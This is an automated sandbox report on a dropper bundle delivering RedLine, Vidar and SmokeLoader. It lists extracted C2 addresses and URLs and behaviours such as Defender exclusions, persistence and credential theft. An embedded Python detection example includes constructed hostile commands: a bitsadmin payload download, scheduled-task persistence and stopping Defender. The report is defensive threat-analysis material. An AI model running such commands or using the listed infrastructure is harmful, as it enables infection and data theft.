Resubmissions
06-09-2021 14:13  210906-rjpvrsedbm  score 10
08-07-2021 11:08  210708-4gztl3mwl6  score 10
08-07-2021 08:02  210708-klfb4qeda6  score 10
07-07-2021 09:39  210707-nem57xyvf2  score 10
06-07-2021 17:51  210706-7pcrmjy3fa  score 10
06-07-2021 13:45  210706-eybelwcq86  score 10
05-07-2021 04:26  210705-z99jkt6lce  score 10

Analysis
max time kernel: 1548s
max time network: 1808s
platform: windows10_x64
resource: win10v20210410
submitted: 07-07-2021 09:39
Static task: static1

Behavioral tasks (task: sample, resource):
behavioral1: setup_x86_x64_install - копия (10).exe, win7v20210410
behavioral2: setup_x86_x64_install - копия (10).exe, win10v20210408
behavioral3: setup_x86_x64_install - копия (11).exe, win7v20210410
behavioral4: setup_x86_x64_install - копия (11).exe, win10v20210408
behavioral5: setup_x86_x64_install - копия (12).exe, win7v20210410
behavioral6: setup_x86_x64_install - копия (12).exe, win10v20210408
behavioral7: setup_x86_x64_install - копия (13).exe, win7v20210410
behavioral8: setup_x86_x64_install - копия (13).exe, win10v20210410
behavioral9: setup_x86_x64_install - копия (14).exe, win7v20210408
behavioral10: setup_x86_x64_install - копия (14).exe, win10v20210410
behavioral11: setup_x86_x64_install - копия (15).exe, win7v20210408
behavioral12: setup_x86_x64_install - копия (15).exe, win10v20210410
behavioral13: setup_x86_x64_install - копия (16).exe, win7v20210408
behavioral14: setup_x86_x64_install - копия (16).exe, win10v20210410
behavioral15: setup_x86_x64_install - копия (17).exe, win7v20210410
behavioral16: setup_x86_x64_install - копия (17).exe, win10v20210408
behavioral17: setup_x86_x64_install - копия (18).exe, win7v20210410
behavioral18: setup_x86_x64_install - копия (18).exe, win10v20210408
behavioral19: setup_x86_x64_install - копия (19).exe, win7v20210410
behavioral20: setup_x86_x64_install - копия (19).exe, win10v20210408
behavioral21: setup_x86_x64_install - копия (2).exe, win7v20210410
behavioral22: setup_x86_x64_install - копия (2).exe, win10v20210410
behavioral23: setup_x86_x64_install - копия (20).exe, win7v20210408
behavioral24: setup_x86_x64_install - копия (20).exe, win10v20210410
behavioral25: setup_x86_x64_install - копия (21).exe, win7v20210408
behavioral26: setup_x86_x64_install - копия (21).exe, win10v20210410
behavioral27: setup_x86_x64_install - копия (22).exe, win7v20210408
behavioral28: setup_x86_x64_install - копия (22).exe, win10v20210410
behavioral29: setup_x86_x64_install - копия (23).exe, win7v20210410
behavioral30: setup_x86_x64_install - копия (23).exe, win10v20210408
behavioral31: setup_x86_x64_install - копия (3).exe, win7v20210410
General
Target: setup_x86_x64_install - копия (20).exe
Size: 3.2MB
MD5: 3ae1c212119919e5fce71247286f8e0e
SHA1: 97c1890ab73c539056f95eafede319df774e9d38
SHA256: 30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e
SHA512: 5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config
Extracted redline: ServAni, 87.251.71.195:82
Extracted vidar: 39.4, 706, https://sergeevih43.tumblr.com, profile_id 706
Extracted smokeloader: 2020
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
Signatures

Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process):
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5768 | 5672 | rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6708 | 5672 | rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5612 | 5672 | rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 9140 | 5672 | rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4912 | 5672 | rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5880 | 5672 | rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 8 IoCs
Processes (resource | yara_rule):
behavioral24/memory/208-185-0x0000000000417F26-mapping.dmp | family_redline
behavioral24/memory/208-182-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
behavioral24/memory/3144-272-0x000000000A290000-0x000000000A2C8000-memory.dmp | family_redline
behavioral24/memory/4100-349-0x0000000000417E8E-mapping.dmp | family_redline
behavioral24/memory/5004-350-0x0000000000417E9A-mapping.dmp | family_redline
behavioral24/memory/4960-348-0x0000000000418392-mapping.dmp | family_redline
behavioral24/memory/4636-347-0x0000000000417E4A-mapping.dmp | family_redline
behavioral24/memory/4224-360-0x0000000000417E8A-mapping.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes (description | pid | process | target process):
PID 5804 created 5092 | 5804 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
PID 5440 created 5644 | 5440 | WerFault.exe | MicrosoftEdgeCP.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes (description | pid | process | target process):
PID 5824 created 5072 | 5824 | svchost.exe | ypYDB0vdoDVBp7hsRzifyKGQ.exe
PID 5824 created 6820 | 5824 | svchost.exe | 4AEF.exe
PID 5824 created 5480 | 5824 | svchost.exe | app.exe
PID 5824 created 2184 | 5824 | svchost.exe | app.exe
PID 5824 created 6908 | 5824 | svchost.exe | app.exe
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer 2 IoCs
Processes (resource | yara_rule):
behavioral24/memory/2164-293-0x0000000000400000-0x0000000000949000-memory.dmp | family_vidar
behavioral24/memory/2164-295-0x00000000026A0000-0x000000000273D000-memory.dmp | family_vidar

Processes (resource | yara_rule):
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC2647624\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\libcurlpp.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC2647624\libcurl.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC2647624\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe | aspack_v212_v242
Blocklisted process makes network request 3 IoCs
Processes (flow | pid | process):
521 | 7116 | powershell.exe
527 | 7116 | powershell.exe
606 | 1828 | cmd.exe

Creates new service(s) 1 TTPs

Downloads MZ/PE file

Drops file in Drivers directory 4 IoCs
Processes (description | ioc | process):
File opened for modification | C:\Windows\system32\drivers\etc\hosts | èeèrgegdè_éçè_)))_.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | 12(((((.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | _____________bob.exe
Executes dropped EXE 64 IoCs
Modifies Windows Firewall 1 TTPs

Sets service image path in registry 2 TTPs

Processes (resource | yara_rule):
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 7ZI0ROMveurFDV8Aq7DVyS06.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ARSOO0DIp2UugIvuwrSyM9oD.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ARSOO0DIp2UugIvuwrSyM9oD.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 7ZI0ROMveurFDV8Aq7DVyS06.exe

Checks computer location settings 2 TTPs 7 IoCs
Looks up the country code configured in the registry, likely as a geofence.
Processes (description | ioc | process):
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | jingzhang.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Xegysukinae.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Bugyponoku.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Fikumigaena.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Tuvuduloxa.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | arnatic_3.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | arnatic_6.exe
Loads dropped DLL 64 IoCs
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes (resource | yara_rule):
C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe | themida
C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe | themida
C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe | themida
C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe | themida

Processes (description | ioc | process):
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" | rundll32.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QRIvBFx = "0" | rundll32.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 5 IoCs
Processes (description | ioc | process):
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 1100866.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xaecylolunae.exe\"" | èeèrgegdè_éçè_)))_.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tesaetonaexa.exe\"" | _____________bob.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Pefefariny.exe\"" | 12(((((.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Daewixaeruli.exe\"" | Conhost.exe

Checks for any installed AV software in registry 1 TTPs 5 IoCs
Processes (description | ioc | process):
Key opened | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab | Conhost.exe
Key opened | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab | powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes (description | ioc | process):
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 7ZI0ROMveurFDV8Aq7DVyS06.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Browzar.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md8_8eus.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | note8876.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ARSOO0DIp2UugIvuwrSyM9oD.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Drops file in System32 directory 32 IoCs
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes (pid | process):
1128 | cjG0Iam1Jj0cNNTd_SEVIp5b.exe
2144 | ARSOO0DIp2UugIvuwrSyM9oD.exe
4140 | 7ZI0ROMveurFDV8Aq7DVyS06.exe
4792 | iaK6LGtP0xsu467Y5J6nvafj.exe
Suspicious use of SetThreadContext 17 IoCs
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 6 IoCs
Processes: MicrosoftEdge.exe (5)
description | ioc | process
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT |
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Common in ransomware, but also in installers and media players (this run drops a VLC-based player that ships a CD-audio access plugin, libcdda_plugin.dll), so on its own it is a weak indicator.
-
Program crash 14 IoCs
Processes: WerFault.exe (14)
pid | pid_target | process | target process
2184 | 5092 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
4364 | 5092 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
4104 | 5092 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
4752 | 5092 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
5612 | 5092 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
5804 | 5092 | WerFault.exe | mqnMtgWvbwILOMZrKc6CsUOn.exe
6236 | 3876 | WerFault.exe | Browzar.exe
6916 | 5072 | WerFault.exe | ypYDB0vdoDVBp7hsRzifyKGQ.exe
6028 | 4952 | WerFault.exe | MicrosoftEdgeCP.exe
5440 | 5644 | WerFault.exe | MicrosoftEdgeCP.exe
5220 | 9204 | WerFault.exe | rundll32.exe
6528 | 6796 | WerFault.exe | LibraVPN.exe
9088 | 4984 | WerFault.exe | MicrosoftEdgeCP.exe
6732 | 3928 | WerFault.exe | MicrosoftEdgeCP.exe
-
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: 4590.exe, toolspab1.exe (2), jdrbfsf (2), wirbfsf (2), arnatic_2.exe, rsrbfsf (2), MrGh6bEH0L0a.exe
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4590.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspab1.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspab1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | jdrbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wirbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | jdrbfsf
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | arnatic_2.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspab1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | jdrbfsf
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | rsrbfsf
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wirbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | rsrbfsf
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wirbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | MrGh6bEH0L0a.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | jdrbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspab1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspab1.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | arnatic_2.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wirbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | rsrbfsf
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | MrGh6bEH0L0a.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | MrGh6bEH0L0a.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wirbfsf
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | rsrbfsf
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wirbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | arnatic_2.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4590.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspab1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | rsrbfsf
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | jdrbfsf
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4590.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | jdrbfsf
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | rsrbfsf
-
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: svchost.exe, xe3VggU3QswqnlgTx1tHoeRE.exe, WerFault.exe (2), 25D.exe, powershell.exe, DFFC.exe, arnatic_1.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | xe3VggU3QswqnlgTx1tHoeRE.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | xe3VggU3QswqnlgTx1tHoeRE.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 25D.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 25D.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | DFFC.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | powershell.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | arnatic_1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | arnatic_1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | DFFC.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
Processes: timeout.exe (5)
pid | process
1236 | timeout.exe
7108 | timeout.exe
5268 | timeout.exe
580 | timeout.exe
8624 | timeout.exe
-
Download via BitsAdmin 1 TTPs 5 IoCs
Processes: bitsadmin.exe (5)
pid | process
5612 | bitsadmin.exe
7856 | bitsadmin.exe
7380 | bitsadmin.exe
3936 | bitsadmin.exe
4728 | bitsadmin.exe
-
Enumerates system info in registry 2 TTPs 7 IoCs
Processes: chrome.exe, WerFault.exe (2)
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
-
Gathers network information 2 TTPs 1 IoCs
Uses a command-line utility to view network configuration.
Processes: ipconfig.exe
pid | process
6400 | ipconfig.exe
-
Kills process with taskkill 9 IoCs
Processes: taskkill.exe (9)
pid | process
1916 | taskkill.exe
6772 | taskkill.exe
7944 | taskkill.exe
8772 | taskkill.exe
4280 | taskkill.exe
1516 | taskkill.exe
6832 | taskkill.exe
6188 | taskkill.exe
5148 | taskkill.exe
-
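The signatures above (sc.exe, schtasks, timeout.exe, bitsadmin, ipconfig, taskkill) each fire on a single utility. On a monitored host the stronger signal is one parent spawning several of them in sequence: a delay, a BITS download, a scheduled task, a taskkill against the browser. The Python below is an added example, not part of this sandbox report or of the sample's behaviour: it applies one command-line rule per utility to Sysmon-style process-creation records and groups the flagged children by parent pid. The rules, the record layout and every pid and command line in SAMPLE_EVENTS are constructed for illustration; none is copied from the report's process list.

```python
"""Correlate single-utility LOLBin hits into a per-parent chain.

Added example. Runs over Sysmon-style process-creation records
(pid, ppid, image, command line); the records below are constructed.
"""
import re
from collections import defaultdict

# image basename -> (regex the command line must match, behaviour label).
# These regexes are this example's own heuristics, not the sandbox's signatures.
LOLBIN_RULES = {
    "timeout.exe":   (re.compile(r"(^|\s)(/t\s+)?\d+(\s|$)"), "delays execution"),
    "bitsadmin.exe": (re.compile(r"/transfer\b", re.I), "download via BITS"),
    "schtasks.exe":  (re.compile(r"/create\b", re.I), "creates scheduled task"),
    "taskkill.exe":  (re.compile(r"/(im|pid)\b", re.I), "kills process"),
    "sc.exe":        (re.compile(r"\b(create|config|start|stop|delete)\b", re.I), "controls services"),
    "ipconfig.exe":  (re.compile(r"."), "gathers network config"),  # any invocation counts
}


def classify(image: str, cmdline: str):
    """Return a behaviour label when (image, cmdline) matches a rule, else None."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    rule = LOLBIN_RULES.get(name)
    if rule is None:
        return None
    pattern, label = rule
    return label if pattern.search(cmdline) else None


def chains_by_parent(events, min_behaviours=3):
    """Group flagged children by parent pid.

    Returns {ppid: sorted labels} for parents that spawned at least
    min_behaviours distinct behaviours. A lone timeout or ipconfig under an
    unrelated parent does not make the cut; a dropper driving five utilities does.
    """
    per_parent = defaultdict(set)
    for _pid, ppid, image, cmdline in events:
        label = classify(image, cmdline)
        if label:
            per_parent[ppid].add(label)
    return {ppid: sorted(labels)
            for ppid, labels in per_parent.items() if len(labels) >= min_behaviours}


# Constructed records: (pid, ppid, image, command line). pid 4100 plays the
# dropper that drives every utility; 8800 is unrelated background noise.
SAMPLE_EVENTS = [
    (4100, 3300, r"C:\Users\user\AppData\Local\Temp\dropper.exe", r'"C:\Users\user\AppData\Local\Temp\dropper.exe"'),
    (4101, 4100, r"C:\Windows\System32\timeout.exe", "timeout /t 15"),
    (4102, 4100, r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job /download /priority high http://example.invalid/p.bin C:\Users\user\AppData\Local\Temp\p.bin"),
    (4103, 4100, r"C:\Windows\System32\schtasks.exe",
     r"schtasks /create /f /tn Updater /tr C:\Users\user\AppData\Local\Temp\p.bin /sc minute /mo 5"),
    (4104, 4100, r"C:\Windows\System32\taskkill.exe", "taskkill /f /im chrome.exe"),
    (4105, 4100, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    (4106, 4100, r"C:\Windows\System32\sc.exe", "sc stop WinDefend"),
    (8801, 8800, r"C:\Windows\System32\sc.exe", "sc query wuauserv"),  # read-only query: not flagged
    (8802, 8800, r"C:\Windows\System32\timeout.exe", "timeout /t 2"),  # one behaviour only: below threshold
]

if __name__ == "__main__":
    for ppid, labels in chains_by_parent(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {', '.join(labels)}")
```

Two caveats when moving this to real telemetry. Pids are reused over a long run (this report lists 5612 both as a WerFault.exe instance in the crash table and as a bitsadmin.exe instance above), so key on parent pid plus process creation time, or on the parent's process GUID where the sensor provides one. And the threshold is a tuning knob: installers legitimately run sc and schtasks, so start at three distinct behaviours and review what each environment produces before lowering it.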
Processes: browser_broker.exe (5), MicrosoftEdgeCP.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main |
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes: app.exe (3), ypYDB0vdoDVBp7hsRzifyKGQ.exe, svchost.exe (2), cmd.exe
Keys written as M\... are under M = \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E (the time-zone display-name cache); all other keys are shown in full.
description | ioc | process
